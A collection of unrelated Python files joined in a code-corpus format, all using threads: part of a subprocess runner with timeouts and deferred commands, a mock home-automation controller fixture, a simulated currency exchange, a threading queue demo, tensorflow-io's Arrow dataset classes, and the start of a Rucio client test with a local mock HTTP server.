# Let's create a queue to get the timeout thread response on a deterministic way
timeout_queue = queue.Queue()
is_timeout = False
thread = threading.Thread(
target=_timeout_check_thread,
args=(process, timeout, timeout_queue),
)
thread.setDaemon(True)
thread.start()
process_output = None
stdout = None
try:
# Don't use process.wait() since it may deadlock on old Python versions
# Also it won't allow communicate() to get incomplete output on timeouts
while process.poll() is None:
sleep(MIN_RESOLUTION)
try:
is_timeout = timeout_queue.get_nowait()
except queue.Empty:
pass
else:
break
# We still need to use process.communicate() in this loop so we don't get stuck
# with poll() is not None even after process is finished
if _stdout is not False:
try:
stdout, _ = process.communicate()
# ValueError is raised on closed IO file
except (TimeoutExpired, ValueError):
pass
exit_code = process.poll()
if _stdout is not False:
try:
stdout, _ = process.communicate()
except (TimeoutExpired, ValueError):
pass
process_output = to_encoding(stdout, encoding, errors)
# On PyPy 3.7 only, we can have a race condition where we try to read the queue before
# the thread could write to it, failing to register a timeout.
# This workaround prevents reading the queue while the thread is still alive
while thread.is_alive():
sleep(MIN_RESOLUTION)
try:
is_timeout = timeout_queue.get_nowait()
except queue.Empty:
pass
if is_timeout:
raise TimeoutExpired(process, timeout, process_output)
return exit_code, process_output
except KeyboardInterrupt:
raise KbdInterruptGetOutput(process_output)
try:
# Finally, we won't use encoding & errors arguments for Popen
# since it would defeat the idea of binary pipe reading in live mode
# Python >= 3.3 has SubProcessError(TimeoutExpired) class
# Python >= 3.6 has encoding & error arguments
# universal_newlines=True makes netstat command fail under windows
# timeout does not work under Python 2.7 with subprocess32 < 3.5
# decoder may be cp437 or unicode_escape for dos commands or utf-8 for powershell
# Disabling pylint error for the same reason as above
# pylint: disable=E1123
if sys.version_info >= (3, 6):
process = subprocess.Popen(
command,
stdout=_stdout,
stderr=_stderr,
shell=shell,
universal_newlines=universal_newlines,
encoding=encoding,
errors=errors,
creationflags=creationflags,
bufsize=bufsize, # 1 = line buffered
close_fds=close_fds,
**kwargs
)
else:
process = subprocess.Popen(
command,
stdout=_stdout,
stderr=_stderr,
shell=shell,
universal_newlines=universal_newlines,
creationflags=creationflags,
bufsize=bufsize,
close_fds=close_fds,
**kwargs
)
try:
if method == "poller" or live_output and _stdout is not False:
exit_code, output = _poll_process(process, timeout, encoding, errors)
else:
exit_code, output = _monitor_process(process, timeout, encoding, errors)
except KbdInterruptGetOutput as exc:
exit_code = -252
output = "KeyboardInterrupted. Partial output\n{}".format(exc.output)
try:
kill_childs_mod(process.pid, itself=True, soft_kill=False)
except AttributeError:
pass
if stdout_to_file:
_stdout.write(output.encode(encoding, errors=errors))
logger.debug(
'Command "{}" returned with exit code "{}". Command output was:'.format(
command, exit_code
)
)
except subprocess.CalledProcessError as exc:
exit_code = exc.returncode
try:
output = exc.output
except AttributeError:
output = "command_runner: Could not obtain output from command."
if exit_code in valid_exit_codes if valid_exit_codes is not None else [0]:
logger.debug(
'Command "{}" returned with exit code "{}". Command output was:'.format(
command, exit_code
)
)
logger.error(
'Command "{}" failed with exit code "{}". Command output was:'.format(
command, exc.returncode
)
)
logger.error(output)
except FileNotFoundError as exc:
logger.error('Command "{}" failed, file not found: {}'.format(command, exc))
exit_code, output = -253, exc.__str__()
# On python 2.7, OSError is also raised when file is not found (no FileNotFoundError)
# pylint: disable=W0705 (duplicate-except)
except (OSError, IOError) as exc:
logger.error('Command "{}" failed because of OS: {}'.format(command, exc))
exit_code, output = -253, exc.__str__()
except TimeoutExpired as exc:
message = 'Timeout {} seconds expired for command "{}" execution. Original output was: {}'.format(
timeout, command, exc.output
)
logger.error(message)
if stdout_to_file:
_stdout.write(message.encode(encoding, errors=errors))
exit_code, output = (
-254,
'Timeout of {} seconds expired for command "{}" execution. Original output was: {}'.format(
timeout, command, exc.output
),
)
# We need to be able to catch a broad exception
# pylint: disable=W0703
except Exception as exc:
logger.error(
'Command "{}" failed for unknown reasons: {}'.format(command, exc),
exc_info=True,
)
logger.debug("Error:", exc_info=True)
exit_code, output = -255, exc.__str__()
finally:
if stdout_to_file:
_stdout.close()
if stderr_to_file:
_stderr.close()
logger.debug(output)
return exit_code, output
def deferred_command(command, defer_time=300):
# type: (str, int) -> None
"""
This is basically an ugly hack to launch commands which are detached from parent process
Especially useful to launch an auto update/deletion of a running executable after a given amount of
seconds after it finished
"""
# Use ping as a standard timer in shell since it's present on virtually *any* system
if os.name == "nt":
deferrer = "ping 127.0.0.1 -n {} > NUL & ".format(defer_time)
else:
deferrer = "ping 127.0.0.1 -c {} > /dev/null && ".format(defer_time)
# We'll create a independent shell process that will not be attached to any stdio interface
# Our command shall be a single string since shell=True
subprocess.Popen(
deferrer + command,
shell=True,
stdin=None,
stdout=None,
stderr=None,
close_fds=True,
)
|
__init__.py
|
"""Unit test package for niko_homekit."""
import pytest
import json
import threading
from socket import socket
from threading import Thread
from niko_homekit.niko import Niko
class MockNikoController(object):
"""Mocks a Niko Home Control controller
"""
def __init__(self):
super(MockNikoController, self).__init__()
self.sock = socket()
self.sock.bind(("127.0.0.1", 0))
self.sock.listen(1)
self.sock.settimeout(1)
self._stop = False
self.calls = []
self.connections = 0
pass
@property
def port(self):
return self.sock.getsockname()[1]
def _start(self):
try:
conn, addr = self.sock.accept()
with conn:
self.connections += 1
while not self._stop:
try:
data = conn.recv(1024).decode()
self.calls.append(data)
if not data:
break
print(data)
parsed = json.loads(data)
print(parsed)
if "cmd" in parsed:
result = {"cmd": parsed["cmd"]}
print(result)
if parsed["cmd"] == "listlocations":
result["data"] = [
{"id": 1, "name": "location1"},
{"id": 2, "name": "location2"},
]
conn.sendall(json.dumps(result).encode() + b"\r\n")
elif parsed["cmd"] == "listactions":
result["data"] = [
{
"id": 1,
"name": "Action 1",
"value1": 0,
"type": 1,
},
{
"id": 2,
"name": "Action 2",
"value1": 0,
"type": 1,
},
]
conn.sendall(json.dumps(result).encode() + b"\r\n")
elif parsed["cmd"] == "executeactions":
result["data"] = {"error": 0}
conn.sendall(json.dumps(result).encode() + b"\r\n")
else:
conn.sendall(data.encode() + b"\r\n")
except ConnectionResetError:
break
except json.JSONDecodeError:
if data:
conn.sendall(data.encode() + b"\r\n")
pass
except ConnectionAbortedError as e:
print("Closing conn")
if not self._stop:
raise (e)
return
def start(self):
self.thread = Thread(target=self._start, daemon=True)
return self.thread.start()
def shutdown(self):
print("Shutting down MockNikoController")
self._stop = True
self.sock.close()
self.thread.join(2)
print("Stopped MockNikoController")
return
@pytest.fixture
def controller():
_controller = MockNikoController()
_controller.start()
yield _controller
_controller.shutdown()
@pytest.fixture
async def niko(controller):
niko = Niko("127.0.0.1", controller.port)
await niko.connect()
yield niko
await niko.close()
|
exchange.py
|
# DEPENDENCIES
import time
import os
import threading
import numpy as np
# CUSTOM MODULES
import support
from globals import config_dict
class Exchange(object):
"""
The Exchange class keeps track of the prices
"""
def __init__(self):
self.price_vector:np.ndarray = np.array([config_dict['Exchange']['price_1'], config_dict['Exchange']['price_2'], config_dict['Exchange']['price_3']])
self.price_history:np.ndarray = np.tile(self.price_vector, reps=(config_dict['Exchange']['price_history_length'],1)) # price history matrix with prices being column vectors (each row is a timestep)
self.covariance_matrix:np.ndarray = self.generate_covariance_matrix()
self.rates = self.quick_rates()
self.update_prices()
def current_prices(self) -> tuple:
"""
Return the current prices as a tuple of floats
"""
return self.price_vector[0], self.price_vector[1], self.price_vector[2]
def generate_covariance_matrix(self) -> np.ndarray:
"""
Generate a small random integer sample of 3 variables, calculate the covariance matrix, return it.
"""
n_vars = self.price_vector.shape[0]
samples = np.random.uniform(low=0, high=config_dict['Exchange']['max_variance_factor'], size=(n_vars,10))
return np.cov(samples, bias=True)
def update_prices(self) -> None:
"""
A thread that constantly updates the asset prices
"""
t = threading.Thread(target=self.update_prices_thread, args=[], daemon=True)
t.start()
pass
def update_prices_thread(self) -> None:
"""
A loop that constantly updates the prices.
Draw multivariate normal errors, add them to the prices
to create a random walk process.
"""
while True:
print('prices: ', self.price_vector)
time.sleep(config_dict['Exchange']['update_delay']) # delay between each price update
eps = np.random.multivariate_normal(np.zeros(3), self.covariance_matrix, size=1, check_valid='warn', tol=1e-8) # draw increment
self.price_vector = np.abs(np.add(self.price_vector, eps, casting='unsafe'))[0] # update prices
self.price_history = np.concatenate((self.price_history[1:,:], np.reshape(self.price_vector, newshape=(-1,3))), axis=0) # (t x k) array, with t included timesteps and k prices
self.rates = self.quick_rates() # calculate currency/currency_1 rates
pass
def get_price_history(self):
"""
Converts price history array to a list of price lists - [[p11, p12, ...], [p21, ...], ...]
List i in the returned list is the price history list of price i.
"""
return [list(self.exchange.price_history[:,i]) for i in range(self.exchange.price_history.shape[1])]
def quick_rates(self):
"""
Return a list of rates - each price divided by the first one.
"""
return [p/self.price_vector[0] for p in self.price_vector]
def get_rate(self, c1:int, c2:int):
"""
Get rate of two currencies, c1/c2, so the rate is in label_2/label_1.
:param c1: Numerator of the exchange rate.
:type c1: int
:param c2: Denominator of the exchange rate.
:type c2: int
:return: The rate c1/c2 where c1 and c2 are prices
:rtype: float
"""
return self.price_vector[c1]/self.price_vector[c2]
|
8_queued_no_waits.py
|
import time
import random
import queue
from threading import Thread # still needed for daemon threads
from concurrent.futures import ThreadPoolExecutor
counter = 0
job_queue = queue.Queue()
counter_queue = queue.Queue()
def increment_manager():
global counter
while True:
increment = counter_queue.get() # this waits until an item is available and locks the queue
old_counter = counter
counter = old_counter + increment
job_queue.put((f'New counter value {counter}', '------------'))
counter_queue.task_done() # this unlocks the queue
# printer_manager and increment_manager run continuously because of the `daemon` flag.
Thread(target=increment_manager, daemon=True).start()
def printer_manager():
while True:
for line in job_queue.get():
print(line)
job_queue.task_done()
# printer_manager and increment_manager run continuously because of the `daemon` flag.
Thread(target=printer_manager, daemon=True).start()
def increment_counter():
counter_queue.put(1)
with ThreadPoolExecutor(max_workers=10) as pool:
[pool.submit(increment_counter) for x in range(10)]
counter_queue.join() # wait for counter_queue to be empty
job_queue.join() # wait for job_queue to be empty
|
arrow_dataset_ops.py
|
# Copyright 2017 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Arrow Dataset."""
from functools import partial
import io
from itertools import chain
import os
import socket
import threading
import tempfile
import tensorflow as tf
from tensorflow import dtypes
from tensorflow.python.data.ops import dataset_ops
from tensorflow.python.data.util import structure as structure_lib
from tensorflow_io.core.python.ops import core_ops
if hasattr(tf, "nest"):
from tensorflow import nest # pylint: disable=ungrouped-imports
else:
from tensorflow.python.data.util import nest # pylint: disable=ungrouped-imports
def arrow_to_tensor_type(pa_t):
"""Convert Arrow type to tuple of (Tensor dtype, shape dims).
This function requires pyarrow to be installed.
"""
import pyarrow as pa # pylint: disable=import-outside-toplevel
shape_dims = [] # initialize shape as scalar
if pa.types.is_boolean(pa_t):
tf_t = dtypes.bool
elif pa.types.is_int8(pa_t):
tf_t = dtypes.int8
elif pa.types.is_int16(pa_t):
tf_t = dtypes.int16
elif pa.types.is_int32(pa_t):
tf_t = dtypes.int32
elif pa.types.is_int64(pa_t):
tf_t = dtypes.int64
elif pa.types.is_uint8(pa_t):
tf_t = dtypes.uint8
elif pa.types.is_uint16(pa_t):
tf_t = dtypes.uint16
elif pa.types.is_uint32(pa_t):
tf_t = dtypes.uint32
elif pa.types.is_uint64(pa_t):
tf_t = dtypes.uint64
elif pa.types.is_float16(pa_t):
tf_t = dtypes.float16
elif pa.types.is_float32(pa_t):
tf_t = dtypes.float32
elif pa.types.is_float64(pa_t):
tf_t = dtypes.float64
elif pa.types.is_list(pa_t):
if pa.types.is_list(pa_t.value_type):
raise TypeError("Nested arrays are not currently supported: " + str(pa_t))
tf_t, shape_dims = arrow_to_tensor_type(pa_t.value_type)
shape_dims.append(None) # pyarrow scalar arrays can be variable length
else:
raise TypeError("Unsupported type in conversion from Arrow: " + str(pa_t))
return tf_t, shape_dims
def arrow_schema_to_tensor_types(schema):
"""Convert an Arrow schema to tuple of (Tensor dtypes, TensorShapes).
This function requires pyarrow to be installed.
"""
type_shape_list = [arrow_to_tensor_type(field.type) for field in schema]
tensor_types, shape_dims = zip(*type_shape_list)
tensor_shapes = tuple(tf.TensorShape(s) for s in shape_dims)
return tensor_types, tensor_shapes
class ArrowBaseDataset(dataset_ops.DatasetV2):
"""Base class for Arrow Datasets to provide columns used in record batches
and corresponding output tensor types, shapes and classes.
"""
batch_modes_supported = ("keep_remainder", "drop_remainder", "auto")
def __init__(
self,
make_variant_fn,
columns,
output_types,
output_shapes=None,
batch_size=None,
batch_mode="keep_remainder",
):
self._columns = columns
self._structure = structure_lib.convert_legacy_structure(
output_types,
output_shapes
or nest.map_structure(lambda _: tf.TensorShape(None), output_types),
nest.map_structure(lambda _: tf.Tensor, output_types),
)
self._batch_size = tf.convert_to_tensor(
batch_size or 0, dtype=dtypes.int64, name="batch_size"
)
if batch_mode not in self.batch_modes_supported:
raise ValueError(
"Unsupported batch_mode: '{}', must be one of {}".format(
batch_mode, self.batch_modes_supported
)
)
self._batch_mode = tf.convert_to_tensor(
batch_mode, dtypes.string, name="batch_mode"
)
if batch_size is not None or batch_mode == "auto":
spec_batch_size = batch_size if batch_mode == "drop_remainder" else None
# pylint: disable=protected-access
self._structure = nest.map_structure(
lambda component_spec: component_spec._batch(spec_batch_size),
self._structure,
)
variant_tensor = make_variant_fn(
columns=self._columns,
batch_size=self._batch_size,
batch_mode=self._batch_mode,
**self._flat_structure
)
super().__init__(variant_tensor)
def _inputs(self):
return []
@property
def element_spec(self):
return self._structure
@property
def columns(self):
return self._columns
@property
def batch_size(self):
return self._batch_size
@property
def batch_mode(self):
return self._batch_mode
class ArrowDataset(ArrowBaseDataset):
"""An Arrow Dataset from record batches in memory, or a Pandas DataFrame.
"""
def __init__(
self,
serialized_batches,
columns,
output_types,
output_shapes=None,
batch_size=None,
batch_mode="keep_remainder",
arrow_buffer=None,
):
"""Create an ArrowDataset from a Tensor of serialized batches.
This constructor requires pyarrow to be installed.
Args:
serialized_batches: A string Tensor as a serialized buffer containing
Arrow record batches in Arrow File format
columns: A list of column indices to be used in the Dataset
output_types: Tensor dtypes of the output tensors
output_shapes: TensorShapes of the output tensors or None to
infer partial
batch_size: Batch size of output tensors, setting a batch size here
will create batched Tensors from Arrow memory and can be more
efficient than using tf.data.Dataset.batch().
NOTE: batch_size does not need to be set if batch_mode='auto'
batch_mode: Mode of batching, supported strings:
"keep_remainder" (default, keeps partial batch data),
"drop_remainder" (discard partial batch data),
"auto" (size to number of records in Arrow record batch)
arrow_buffer: Optional Arrow Buffer containing Arrow record batches in
Arrow File format. This will share the Arrow buffer with
the C++ kernel by address for zero-copy. Only supported if
the kernel process is local, with TensorFlow in eager mode.
If this is used, set `serialized_batches` to `None`.
"""
if serialized_batches is not None:
make_variant_fn = partial(
core_ops.io_arrow_serialized_dataset, serialized_batches
)
elif arrow_buffer is None:
raise ValueError("Must set either serialzied_batches or arrow_buffer")
elif not tf.executing_eagerly():
raise ValueError(
"Using arrow_buffer for zero-copy only supported in "
"TensorFlow Eager mode."
)
else:
address_int = arrow_buffer.address
buffer_address = tf.convert_to_tensor(
address_int, dtype=dtypes.uint64, name="buffer_address"
)
buffer_size = tf.convert_to_tensor(
arrow_buffer.size, dtype=dtypes.int64, name="buffer_size"
)
make_variant_fn = partial(
core_ops.io_arrow_zero_copy_dataset, buffer_address, buffer_size
)
# Keep a reference to the arrow buffers used
self._arrow_buffer_refs = [arrow_buffer]
super().__init__(
make_variant_fn,
columns,
output_types,
output_shapes,
batch_size,
batch_mode,
)
@classmethod
def from_record_batches(
cls,
record_batches,
output_types,
output_shapes=None,
columns=None,
batch_size=None,
batch_mode="keep_remainder",
):
"""Create an ArrowDataset directly from Arrow record batches.
This constructor requires pyarrow to be installed.
Args:
record_batches: An Arrow record batch or sequence of record batches
output_types: Tensor dtypes of the output tensors
output_shapes: TensorShapes of the output tensors or None to
infer partial
batch_size: Batch size of output tensors, setting a batch size here
will create batched tensors from Arrow memory and can be more
efficient than using tf.data.Dataset.batch().
NOTE: batch_size does not need to be set if batch_mode='auto'
batch_mode: Mode of batching, supported strings:
"keep_remainder" (default, keeps partial batch data),
"drop_remainder" (discard partial batch data),
"auto" (size to number of records in Arrow record batch)
columns: A list of column indices to be used in the Dataset
"""
import pyarrow as pa # pylint: disable=import-outside-toplevel
if isinstance(record_batches, pa.RecordBatch):
record_batches = [record_batches]
if columns is None:
columns = tuple(range(record_batches[0].num_columns))
assert record_batches
if tf.executing_eagerly():
sink = pa.BufferOutputStream()
writer = pa.RecordBatchFileWriter(sink, record_batches[0].schema)
for batch in record_batches:
writer.write_batch(batch)
writer.close()
serialized_batches = None
arrow_buffer = sink.getvalue()
else:
buf = io.BytesIO()
writer = pa.RecordBatchFileWriter(buf, record_batches[0].schema)
for batch in record_batches:
writer.write_batch(batch)
writer.close()
serialized_batches = tf.convert_to_tensor(
buf.getvalue(), dtype=dtypes.string, name="serialized_batches"
)
arrow_buffer = None
return cls(
serialized_batches,
columns,
output_types,
output_shapes,
batch_size=batch_size,
batch_mode=batch_mode,
arrow_buffer=arrow_buffer,
)
@classmethod
def from_pandas(
cls,
df,
columns=None,
preserve_index=True,
batch_size=None,
batch_mode="keep_remainder",
):
"""Create an ArrowDataset from a given Pandas DataFrame. Output types
and shapes are inferred from the Arrow schema after DataFrame conversion.
If preserve_index is True, the DataFrame index will be the last column.
This method requires pyarrow to be installed.
Args:
df: a Pandas DataFrame
columns: Optional column indices to use, if None all are used
preserve_index: Flag to include the DataFrame index as the last column
batch_size: Batch size of output tensors, setting a batch size here
will create batched tensors from Arrow memory and can be more
efficient than using tf.data.Dataset.batch().
NOTE: batch_size does not need to be set if batch_mode='auto'
batch_mode: Mode of batching, supported strings:
"keep_remainder" (default, keeps partial batch data),
"drop_remainder" (discard partial batch data),
"auto" (size to number of records in Arrow record batch)
"""
import pyarrow as pa # pylint: disable=import-outside-toplevel
if columns is not None:
df = df.iloc[:, list(columns)]
batch = pa.RecordBatch.from_pandas(df, preserve_index=preserve_index)
columns = tuple(range(batch.num_columns))
output_types, output_shapes = arrow_schema_to_tensor_types(batch.schema)
return cls.from_record_batches(
batch,
output_types,
output_shapes,
columns=columns,
batch_size=batch_size,
batch_mode=batch_mode,
)
class ArrowFeatherDataset(ArrowBaseDataset):
"""An Arrow Dataset for reading record batches from Arrow feather files.
Feather is a light-weight columnar format ideal for simple writing of
Pandas DataFrames. Pyarrow can be used for reading/writing Feather files,
see https://arrow.apache.org/docs/python/ipc.html#feather-format
"""
def __init__(
self,
filenames,
columns,
output_types,
output_shapes=None,
batch_size=None,
batch_mode="keep_remainder",
):
"""Create an ArrowDataset from one or more Feather file names.
Args:
filenames: A `tf.string` tensor, Python list or scalar containing files
in Arrow Feather format
columns: A list of column indices to be used in the Dataset
output_types: Tensor dtypes of the output tensors
output_shapes: TensorShapes of the output tensors or None to
infer partial
batch_size: Batch size of output tensors, setting a batch size here
will create batched tensors from Arrow memory and can be more
efficient than using tf.data.Dataset.batch().
NOTE: batch_size does not need to be set if batch_mode='auto'
batch_mode: Mode of batching, supported strings:
"keep_remainder" (default, keeps partial batch data),
"drop_remainder" (discard partial batch data),
"auto" (size to number of records in Arrow record batch)
"""
filenames = tf.convert_to_tensor(
filenames, dtype=dtypes.string, name="filenames"
)
super().__init__(
partial(core_ops.io_arrow_feather_dataset, filenames),
columns,
output_types,
output_shapes,
batch_size,
batch_mode,
)
@classmethod
def from_schema(
cls,
filenames,
schema,
columns=None,
batch_size=None,
batch_mode="keep_remainder",
):
"""Create an Arrow Dataset for reading record batches from Arrow feather
files, inferring output types and shapes from the given Arrow schema.
This method requires pyarrow to be installed.
Args:
filenames: A `tf.string` tensor, Python list or scalar containing files
in Arrow Feather format
schema: Arrow schema defining the record batch data in the stream
columns: A list of column indicies to use from the schema, None for all
batch_size: Batch size of output tensors, setting a batch size here
will create batched tensors from Arrow memory and can be more
efficient than using tf.data.Dataset.batch().
NOTE: batch_size does not need to be set if batch_mode='auto'
batch_mode: Mode of batching, supported strings:
"keep_remainder" (default, keeps partial batch data),
"drop_remainder" (discard partial batch data),
"auto" (size to number of records in Arrow record batch)
"""
if columns is None:
columns = list(range(len(schema)))
output_types, output_shapes = arrow_schema_to_tensor_types(schema)
return cls(
filenames, columns, output_types, output_shapes, batch_size, batch_mode
)
class ArrowStreamDataset(ArrowBaseDataset):
"""An Arrow Dataset for reading record batches from an input stream.
Currently supported input streams are a socket client or stdin.
"""
def __init__(
self,
endpoints,
columns,
output_types,
output_shapes=None,
batch_size=None,
batch_mode="keep_remainder",
):
"""Create an ArrowDataset from an input stream.
Args:
endpoints: A `tf.string` tensor, Python list or scalar string defining the
input stream.
`endpoints` supports the following formats:
- "host:port": IPv4 address (default)
- "tcp://<host:port>": IPv4 address,
- "unix://<path>": local path as unix socket address,
- "fd://<number>": STDIN or file descriptor number. For
STDIN, use "fd://0" or "fd://-".
columns: A list of column indices to be used in the Dataset
output_types: Tensor dtypes of the output tensors
output_shapes: TensorShapes of the output tensors or None to
infer partial
batch_size: Batch size of output tensors, setting a batch size here
will create batched tensors from Arrow memory and can be more
efficient than using tf.data.Dataset.batch().
NOTE: batch_size does not need to be set if batch_mode='auto'
batch_mode: Mode of batching, supported strings:
"keep_remainder" (default, keeps partial batch data),
"drop_remainder" (discard partial batch data),
"auto" (size to number of records in Arrow record batch)
"""
endpoints = tf.convert_to_tensor(
endpoints, dtype=dtypes.string, name="endpoints"
)
super().__init__(
partial(core_ops.io_arrow_stream_dataset, endpoints),
columns,
output_types,
output_shapes,
batch_size,
batch_mode,
)
@classmethod
def from_schema(
cls,
endpoints,
schema,
columns=None,
batch_size=None,
batch_mode="keep_remainder",
):
"""Create an Arrow Dataset from an input stream, inferring output types
and shapes from the given Arrow schema.
This method requires pyarrow to be installed.
Args:
endpoints: A `tf.string` tensor, Python list or scalar string defining the
input stream.
`endpoints` supports the following formats:
- "host:port": IPv4 address (default)
- "tcp://<host:port>": IPv4 address,
- "unix://<path>": local path as unix socket address,
- "fd://<number>": STDIN or file descriptor number. For
STDIN, use "fd://0" or "fd://-".
schema: Arrow schema defining the record batch data in the stream
columns: A list of column indicies to use from the schema, None for all
batch_size: Batch size of output tensors, setting a batch size here
will create batched tensors from Arrow memory and can be more
efficient than using tf.data.Dataset.batch().
NOTE: batch_size does not need to be set if batch_mode='auto'
batch_mode: Mode of batching, supported strings:
"keep_remainder" (default, keeps partial batch data),
"drop_remainder" (discard partial batch data),
"auto" (size to number of records in Arrow record batch)
"""
if columns is None:
columns = list(range(len(schema)))
output_types, output_shapes = arrow_schema_to_tensor_types(schema)
return cls(
endpoints, columns, output_types, output_shapes, batch_size, batch_mode
)
@classmethod
def from_record_batches(
cls,
record_batch_iter,
output_types,
output_shapes=None,
columns=None,
batch_size=None,
batch_mode="keep_remainder",
record_batch_iter_factory=None,
):
"""Create an ArrowStreamDataset by serving a sequence of Arrow record
batches in a background thread.
This constructor requires pyarrow to be installed.
Args:
record_batch_iter: A sequence or iterator of Arrow record batches
output_types: Tensor dtypes of the output tensors
output_shapes: TensorShapes of the output tensors or None to
infer partial
columns: Optional list of column indices to be used, if None all are used
batch_size: Batch size of output tensors, setting a batch size here
will create batched tensors from Arrow memory and can be more
efficient than using tf.data.Dataset.batch().
NOTE: batch_size does not need to be set if batch_mode='auto'
batch_mode: Mode of batching, supported strings:
"keep_remainder" (default, keeps partial batch data),
"drop_remainder" (discard partial batch data),
"auto" (size to number of records in Arrow record batch)
record_batch_iter_factory: Optional factory to create additional record
batch iterators for multiple iterations.
"""
import pyarrow as pa # pylint: disable=import-outside-toplevel
# Create a UDS server by default if not Windows
if os.name != "nt":
sock_path = os.path.join(tempfile.gettempdir(), "arrow_io_stream.sock")
endpoint = "unix://{}".format(sock_path)
try:
os.unlink(sock_path)
except OSError:
if os.path.exists(sock_path):
raise
sock = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
sock.bind(sock_path)
# Create a TCP server
else:
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.bind(("127.0.0.1", 0))
host_addr, port = sock.getsockname()
endpoint = "{}:{}".format(host_addr, port)
sock.listen(1)
def run_server():
"""serve record batches"""
curr_iter = record_batch_iter
while True:
conn, _ = sock.accept()
outfile = conn.makefile(mode="wb")
writer = None
try:
for batch in curr_iter:
if writer is None:
writer = pa.RecordBatchStreamWriter(outfile, batch.schema)
writer.write_batch(batch)
if record_batch_iter_factory is not None:
curr_iter = record_batch_iter_factory()
finally:
if writer is not None:
writer.close()
outfile.close()
conn.close()
sock.close()
# Run the server in a thread
server = threading.Thread(target=run_server)
server.daemon = True
server.start()
if columns is None:
columns = list(range(len(output_types)))
return cls(
endpoint, columns, output_types, output_shapes, batch_size, batch_mode
)
@classmethod
def from_pandas(
cls, data_frames, columns=None, preserve_index=True, batch_size=None
):
"""Create an ArrowStreamDataset by serving a DataFrame, or batches of a
DataFrame in a background thread.
This constructor requires pandas and pyarrow to be installed.
Args:
data_frames: A Pandas DataFrame or sequence of DataFrames
columns: Optional column indices to use, if None all are used
preserve_index: Flag to include the DataFrame index as the last column
batch_size: Batch size of output tensors, setting a batch size here
will create batched tensors from Arrow memory and can be more
efficient than using tf.data.Dataset.batch().
NOTE: Currently, only 'keep_remainder' batch mode supported
"""
import pandas as pd # pylint: disable=import-outside-toplevel
import pyarrow as pa # pylint: disable=import-outside-toplevel
if isinstance(data_frames, pd.DataFrame):
data_frames = [data_frames]
def gen_record_batches():
"""record batch generator"""
for df in data_frames:
if columns is not None:
df = df.iloc[:, list(columns)]
# If batching, slice DataFrame and convert to record batches
if batch_size is not None:
# Pandas will produce a partial batch if there is a remainder
for i in range(0, len(df), batch_size):
df_slice = df[i : i + batch_size]
batch = pa.RecordBatch.from_pandas(
df_slice, preserve_index=preserve_index
)
yield batch
# Not batching, convert entire DataFrame to one record batch
else:
batch = pa.RecordBatch.from_pandas(
df, preserve_index=preserve_index
)
yield batch
# Get first batch to convert schema to output types and shapes
record_batch_iter = gen_record_batches()
batch = next(record_batch_iter)
output_types, output_shapes = arrow_schema_to_tensor_types(batch.schema)
return cls.from_record_batches(
chain([batch], record_batch_iter),
output_types,
output_shapes,
batch_size=batch_size,
batch_mode="keep_remainder",
record_batch_iter_factory=gen_record_batches,
)
def list_feather_columns(filename, **kwargs):
"""list_feather_columns"""
if not tf.executing_eagerly():
raise NotImplementedError("list_feather_columns only support eager mode")
memory = kwargs.get("memory", "")
columns, dtypes_, shapes = core_ops.io_list_feather_columns(filename, memory=memory)
entries = zip(tf.unstack(columns), tf.unstack(dtypes_), tf.unstack(shapes))
return {
column.numpy().decode(): tf.TensorSpec(
shape.numpy(), dtype.numpy().decode(), column.numpy().decode()
)
for (column, dtype, shape) in entries
}
|
test_clients.py
|
# -*- coding: utf-8 -*-
# Copyright 2012-2021 CERN
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# Authors:
# - Vincent Garonne <vincent.garonne@cern.ch>, 2012-2017
# - Thomas Beermann <thomas.beermann@cern.ch>, 2012
# - Mario Lassnig <mario.lassnig@cern.ch>, 2012-2019
# - Angelos Molfetas <Angelos.Molfetas@cern.ch>, 2012
# - Martin Barisits <martin.barisits@cern.ch>, 2014
# - Cedric Serfon <cedric.serfon@cern.ch>, 2017
# - Joaquín Bogado <jbogado@linti.unlp.edu.ar>, 2018
# - Andrew Lister <andrew.lister@stfc.ac.uk>, 2019
# - Patrick Austin <patrick.austin@stfc.ac.uk>, 2020
# - Benedikt Ziemons <benedikt.ziemons@cern.ch>, 2020-2021
# - Radu Carpa <radu.carpa@cern.ch>, 2021
# - Simon Fayer <simon.fayer05@imperial.ac.uk>, 2021
from __future__ import print_function
import unittest
from datetime import datetime, timedelta
try:
from SimpleHTTPServer import SimpleHTTPRequestHandler
except ImportError:
from http.server import SimpleHTTPRequestHandler
try:
from SocketServer import TCPServer as HTTPServer
except ImportError:
from http.server import HTTPServer
from os import remove
from threading import Thread
import pytest
from rucio.client.baseclient import BaseClient
from rucio.client.client import Client
from rucio.common.config import config_get, config_get_bool
from rucio.common.exception import CannotAuthenticate, ClientProtocolNotSupported, RucioException
from rucio.common.utils import get_tmp_dir
from rucio.tests.common import get_long_vo
class MockServer:
"""
Start A simple http server in a separate thread to serve as MOCK for testing the client
"""
class Handler(SimpleHTTPRequestHandler):
def send_code_and_message(self, code, headers, message):
"""
Helper which wraps the quite-low-level BaseHTTPRequestHandler primitives and is used to send reponses.
"""
self.send_response(code)
self.send_header("Content-type", "text/plain")
for name, content in headers.items():
self.send_header(name, content)
self.end_headers()
self.wfile.write(message.encode())
def __init__(self, request_handler_cls):
self.server = HTTPServer(('localhost', 0), request_handler_cls)
self.thread = Thread(target=self.server.serve_forever)
self.thread.daemon = True
def __enter__(self):
self.thread.start()
return self
def __exit__(self, exc_type, exc_val, exc_tb):
self.server.shutdown()
self.thread.join()
self.server.server_close()
@property
def base_url(self):
name, port = self.server.server_address
return 'http://{}:{}'.format(name, port)
@pytest.mark.noparallel(reason='fails when run in parallel')
class TestBaseClient(unittest.TestCase):
""" To test Clients"""
def setUp(self):
